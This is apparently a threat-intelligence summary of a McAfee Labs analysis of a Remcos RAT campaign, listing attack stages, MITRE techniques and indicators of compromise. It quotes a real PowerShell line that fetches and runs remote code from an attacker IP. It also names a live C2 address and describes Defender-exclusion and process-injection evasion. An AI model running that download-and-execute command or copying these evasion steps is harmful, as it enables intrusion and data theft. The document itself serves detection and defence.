Keypoints
- Attack begins with a phishing email containing a ZIP/RAR that drops a heavily obfuscated VBS script named within the archive (e.g., “August 2023 Statement of Account.z”).
- The VBS deobfuscates and executes a PowerShell command that downloads an obfuscated PowerShell payload from http://212.192.219.52/87656.txt.
- The downloaded PowerShell uses variable-based obfuscation, Base64 decode and Deflate decompression to reveal a second PowerShell script containing a base64-encoded PE and code to inject it into a spawned process (Wintask.exe).
- Injected PE is a .NET MSIL loader which RC4-decrypts an embedded DLL (dGXsvRf.dll) that is a SykCrypter stage; SykCrypter XOR/RC4-decrypts and deflates the final payload in memory.
- Malware implements persistence (shortcut .pif + Registry Run key), adds Windows Defender exclusions, creates a mutex (Rmc-OB0RTV), and contains configuration with Remcos C2 (172.96.14.18:2404).
- Process injection and reflective/inline loading are used throughout (WriteProcessMemory/ResumeThread and NewLateBinding.LateGet for reflected loading), enabling in-memory execution to evade detection.
MITRE Techniques
- [T1566] Phishing – Delivery via email with archive attachment containing an obfuscated VBS. (‘McAfee labs observed a Remcos RAT campaign where malicious VBS files were delivered via phishing email.’)
- [T1204] User Execution – Victim is induced to open the ZIP/RAR and execute the VBS. (‘A phishing email contained a ZIP/RAR attachment. Inside this ZIP, was a heavily obfuscated VBS file.’)
- [T1105] Ingress Tool Transfer – Downloader fetches 87656.txt via HTTP using Invoke-WebRequest. (‘(Invoke-WebRequest ‘http://212.192.219.52/87656.txt’ -UseBasicParsing).Content).Invoke();’)
- [T1059.001] Command and Scripting Interpreter: PowerShell – VBS launches a PowerShell command to download and execute the payload. (‘The purpose of this VBS script is to download a payload using PowerShell.’)
- [T1027] Obfuscated Files or Information – Multiple layers of obfuscation and random strings hide the true execution chain. (‘Remcos incorporates different obfuscation and anti-debugging techniques to evade detection.’)
- [T1140] Deobfuscate/Decode Files or Information – PowerShell decodes Base64 then decompresses with Deflate to reveal another script/PE. (‘PowerShell script decodes the data using the Base64String algorithm and decompresses the decoded data using the Deflate Stream algorithm.’)
- [T1620] Reflective Code Loading – Decrypted DLL is loaded and executed in memory via NewLateBinding.LateGet with load parameter (reflective/in-memory execution). (‘To execute the decrypted DLL in memory, the malware uses reflecting code loading.’)
- [T1055] Process Injection – PowerShell creates Wintask.exe and injects the decoded PE into that process; later stages use WriteProcessMemory and ResumeThread. (‘Wintask.exe is launched as a new process by the PowerShell script and the aforementioned PE file is injected in the Wintask.exe process.’ / ‘WriteProcessMemory … ResumeThread.’)
- [T1562.001] Impair Defenses: Disable or Modify Security Tools – Malware adds Windows Defender exclusions to evade detection. (‘Windows Defender exclusions are added.’)
- [T1547.001] Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder – Persistence via shortcut (.pif) in Documents and a Registry Run key entry. (‘creates a shortcut file in the Documents folder with a .pif extension, and creates a registry Run key entry.’)
Indicators of Compromise
- [IP Address/URL] Downloader/C2 – http://212.192.219.52/87656.txt (PowerShell downloader), 172.96.14.18:2404 (Remcos C2)
- [File names] Payload stages and drop locations – 87656.txt (obfuscated PowerShell), dGXsvRf.dll (SykCrypter DLL), Wintask.exe (spawned process), and file copy to %appdata% via cmd
- [Mutex] Runtime behavior – Rmc-OB0RTV (mutex created by malware for instance control)
- [SHA256 hashes] Samples observed – 0b3d65305edc50d3882973e47e9fbf4abc1f04eaecb13021f434eba8adf80b67 (VBS), 3ed5729dc3f12a479885e434e0bdb7722f8dd0c0b8b27287111564303b98036c (PowerShell), and 4 more hashes
- [Configuration resource] Encrypted settings – RCData “SETTINGS” (RC4-encrypted Remcos config containing C2 IP, port 2404, and mutex)
The attack flow is: a phishing email delivers a ZIP/RAR that contains an obfuscated VBS script; the VBS cleans comments/garbage, deobfuscates a command string and executes a PowerShell one-liner to fetch http://212.192.219.52/87656.txt. The first-stage PowerShell further obfuscates invoke-expression (iex), then Base64-decodes and deflates a second PowerShell script which contains a base64-encoded PE and routines to inject this PE into a newly spawned process (Wintask.exe).
The injected PE is a .NET MSIL loader that reverses and RC4-decrypts a large embedded blob to produce dGXsvRf.dll (a SykCrypter stage). SykCrypter XOR/RC4-decrypts its embedded payloads, uses a secondary .NET DLL to deflate data, and then performs reflective/inline loading to execute the final components in memory. The chain also modifies Defender exclusions and drops a persistent copy (shortcut .pif + Registry Run key) and creates a mutex (Rmc-OB0RTV).
The final payload is a Visual C++ executable whose RCData “SETTINGS” contains an RC4-encrypted Remcos configuration (key length 76 bytes) that reveals the C2 172.96.14.18 on port 2404 and enables typical Remcos capabilities (credential/browser/crypto wallet harvesting, remote access, and acting as a dropper). Detection and response should focus on the downloader URL/IP, the listed hashes, the mutex, unusual PowerShell decode/decompress activity, creation of Defender exclusions, and the .pif/Run key persistence artifacts.
Read more: https://www.mcafee.com/blogs/other-blogs/mcafee-labs/peeling-back-the-layers-of-remcosrat-malware/